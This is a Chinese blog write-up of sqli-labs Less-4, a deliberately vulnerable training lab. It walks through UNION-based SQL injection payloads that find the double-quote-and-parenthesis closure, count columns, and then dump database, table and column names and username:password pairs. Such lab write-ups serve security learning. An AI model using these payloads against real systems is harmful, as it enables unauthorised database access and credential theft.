sqli-labs全通关(1-75)之Less-4 GET - Error based - Double Quotes - String

已于 2024-10-02 14:50:13 修改
阅读量162 收藏 4
点赞数 2
分类专栏: sqli-labs通关 文章标签: 数据库 渗透测试 SQL注入
于 2024-08-12 01:26:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/141115136
版权

Less-4 GET - Error based - Double Quotes - String

在这里插入图片描述

在这里插入图片描述

一、判断是否存在注入点

使用 单引号 ’ , 双引号 " 判断是否有注入点;
当输入单引号正常返回,而输入双引号时报错,所以存在注入点,根据报错信息;

在这里插入图片描述
根据报错信息,这是以双引号 和 括号做闭合的。
在这里插入图片描述
通过查看源代码也可以看出它的闭合规则应该是双引号加括号;

二、判断注入类型

用减法判断注入类型;
当id=1 时,返回结果Dumb
在这里插入图片描述

当id=2-1时,返回Angelina
在这里插入图片描述
结果不一致,所以时字符型注入;

三、破解 SQL 查询语句中的字段数

构造order by N

1") order by 4--+

order by 3时,正常返回,by 4 时报错;
在这里插入图片描述
所以,可以得出字段数有三列;

四、获取当前数据库

构造union select 获取当前数据库

-1") union select 1, 2,database()--+

在这里插入图片描述
得到当前数据库名称为 security

五、获取数据库中的表

根据数据库名,获取表名 ,关键表是 information_schema.tables ,字段名table_name
构造 union select

-1") union select 1, 2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在这里插入图片描述

由此获得表名:emails,referers,uagents,users

六、获取表中的字段名

以users为例,根据表名,获取字段名,关键表时 information_schema.columns ,表名时 column_name
构造 union select

-1") union select 1, 2,group_concat(column_name) from information_schema.columns where table_name='users'--+

在这里插入图片描述
获得字段名:id,username,password

七、查询到账户的数据

根据表名、字段名;获取数据
构造 union select

-1") union select 1, 2,group_concat(username,':',password) from users--+

在这里插入图片描述

核心还是根据报错信息,推出查询的SQL语句。

什么鬼昵称
关注
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安和合法的环境来学习和实践Web应用安。通过...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
实用SQL小总结
UntifA的博客
09-29 1243
SQL记录
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 507
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 659
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 146
Wintergrasp 冬拥湖 120 VS 120
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 988
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
Redis事务
zhzjn的博客
09-30 324
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
hive/impala/mysql几种数据库sql常用写法和函数说明
biqidaoer的专栏
09-27 417
做大数据开发的时候,会在几种库中来回跳,同一个需求,不同库函数和写法会有出入,在此做汇总沉淀。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 764
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1063
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
AI驱动TDSQL-C Serverless数据库技术实战营--- 操作与电商可视分析
chasemydreamidea的博客
09-27 715
本文将基于腾讯云的高性能应用服务HAI和TDSQL-C MYSQL Serverless版构建AI电商数据分析系统。HAI作为一个面向AI和科学计算的GPU应用服务产品,它具有强大的计算能力,让复杂的AI模型的快速部署和运行的可行性加大,进而支持自然语言处理和图形生成等高级任务。TDSQL-C MYSQL版是一款云原生关系型数据库,其100%的MySQL兼容性,以及极致的弹性、高性能和高可用性,是电商业务中处理海量数据存储和查询的理想选择。本文实践除了使用TDSQL-C MYSQL外,通过python语言和
Redis的基础通用命令
m0_73629312的博客
09-26 941
Redis是一个在内存中存储数据的中间件,可用于作为数据库,也可作为数据缓存。适用于分布式系统。Redis的一些特性:1、主要通过“键值对”的方式存储数据,是一种“非关系型”数据库。2、可编程的:针对Redis的操作,可以直接通过简单的交互式命令进行操作。也可以通过一些脚本的方式,批量执行一些操作(可以带有一些逻辑)。3、拓展性:可以在Redis原有的基础功能上再进行拓展。Redis提供了一组API,可以通过C,C++等语言编写Redis拓展。4、持久化。
MySQL进阶:深入理解数据约束与优化查询
2301_80237574的博客
09-27 776
讲解数据库约束的作用对表中的数据进行进一步的限制,保证数据的正确性、有效性和完整性。约束种类: 主键约束UNIQUE: 唯一约束NOT NULL: 非空约束DEFAULT: 默认值 了解: 外键约束。
MySQL索引
weixin_47755728的博客
09-29 344
为什么用索引可以使查询变快?
一文理解mysql 联合索引和各种SQL语句分析
csdn问鼎
09-28 273
联合索引有两个rule要记一下,1.左到右,中间不能有skip,2.中间是range,后面不能用索引了联合索引的顺序非常重要,即使上面走了索引,也可能效果不好,正确的顺序是根据业务场景把最能区分的列放在前面,按照这样的顺序从左到右。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值